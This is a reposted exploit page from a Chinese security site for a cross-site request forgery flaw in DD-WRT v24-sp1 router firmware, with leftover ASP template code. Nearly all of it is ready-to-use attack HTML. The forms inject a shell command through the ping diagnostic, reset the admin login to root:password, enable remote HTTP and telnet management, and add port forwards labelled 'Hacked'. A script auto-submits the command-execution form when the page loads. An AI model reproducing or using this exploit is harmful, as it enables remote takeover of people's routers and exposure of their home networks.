<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("gt,head") PageTitle=stripHTML("DD-WRT v24-sp1 (XSRF) Cross Site Reference Forgery Exploit") ArticleIntro=stripHTML("77169.com小编引言:DD-WRT v24-sp1 (XSRF) Cross Site Reference Forgery Exploit,漏洞的主要原因:") Articlecontent=stripHTML("Remote root dd-wrt
-------------------------------------------------------------…") ModuleName = stripHTML("exploits") InfoID = stripHTML("145314") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> DD-WRT v24-sp1 (XSRF) Cross Site Reference Forgery Exploit - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> web apps >> 正文

DD-WRT v24-sp1 (XSRF) Cross Site Reference Forgery Exploit

2008/12/7 作者:不祥 来源: 互联网
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>

Remote root dd-wrt
--------------------------------------------------------------------------------

Written by Michael Brooks
Special thanks to str0ke

Exploits tested on the newist stable version:
Firmware: DD-WRT v24-sp1 (07/27/08) micro
Product Homepage:
http://dd-wrt.com/

Impact:
1)Remote root command execuiton /bin/sh
2)Change web administration password and enable remote admistration
3)create new Port Forwarding rules to byass NAT.

<html>
<head>
<meta http-equiv=content-type content=text/html; charset=ISO-8859-1>
</head>
Remote root command execution /bin/sh
<form method=post action=http://192.168.1.1/apply.cgi id=1>
<input name=submit_button value=Ping type=hidden>
<input name=action value=ApplyTake type=hidden>
<input name=submit_type value=start type=hidden>
<input name=change_action value=gozila_cgi type=hidden>
<input name=next_page value=Diagnostics.asp type=hidden>
<input name=ping_ip value=echo owned>
<input name=execute command type=submit>
</form><br><br>
enable remote administration and change login to root:password
<form method=post action=http://192.168.1.1/apply.cgi>
<input name=submit_button value=Management type=hidden>
<input name=action value=ApplyTake type=hidden>
<input name=change_action value= type=hidden>
<input name=submit_type value= type=hidden>
<input name=commit value=1 type=hidden>
<input name=PasswdModify value=0 type=hidden>
<input name=remote_mgt_https value= type=hidden>
<input name=http_enable value=1 type=hidden>
<input name=info_passwd value=0 type=hidden>
<input name=https_enable value= type=hidden>
<input name=http_username value=root type=hidden>
<input name=http_passwd value=password type=hidden>
<input name=http_passwdConfirm value=password type=hidden>
<input name=_http_enable value=1 type=hidden>
<input name=refresh_time value=3 type=hidden>
<input name=status_auth value=1 type=hidden>
<input name=maskmac value=1 type=hidden>
<input name=remote_management value=1 type=hidden>
<input name=http_wanport value=8080 type=hidden>
<input name=remote_mgt_telnet value=1 type=hidden>
<input name=telnet_wanport value=23 type=hidden>
<input name=boot_wait value=on type=hidden>
<input name=cron_enable value=1 type=hidden>
<input name=cron_jobs value= type=hidden>
<input name=loopback_enable value=1 type=hidden>
<input name=nas_enable value=1 type=hidden>
<input name=resetbutton_enable value=1 type=hidden>
<input name=zebra_enable value=1 type=hidden>
<input name=ip_conntrack_max value=512 type=hidden>
<input name=ip_conntrack_tcp_timeouts value=3600 type=hidden>
<input name=ip_conntrack_udp_timeouts value=120 type=hidden>
<input name=overclocking value=200 type=hidden>
<input name=router_style value=yellow type=hidden>
<input name=Remote Admin type=submit>
</form><br><br>
Change Port Forwarding to byass NAT protection.
<form method=post action=http://192.168.1.1/apply.cgi>
<input name=submit_button value=Change Port Forwarding type=submit>
<input name=action value=ApplyTake type=hidden>
<input name=change_action value= type=hidden>
<input name=submit_type value= type=hidden>
<input name=forward_spec value=13 type=hidden>
<input name=name0 value=Hacked type=hidden>
<input name=from0 value=4450 type=hidden>
<input name=pro0 value=both type=hidden>
<input name=ip0 value=192.168.1.100 type=hidden>
<input name=to0 value=445 type=hidden>
<input name=enable0 value=on type=hidden>
<input name=name1 value=Hacked Again type=hidden>
<input name=from1 value=22 type=hidden>
<input name=pro1 value=tcp type=hidden>
<input name=ip1 value=192.168.1.101 type=hidden>
<input name=to1 value=22 type=hidden>
<input name=enable1 value=on type=hidden>
</form>
</html>
<script>
document.getElementById(1).submit();//remote root command execution!
</script>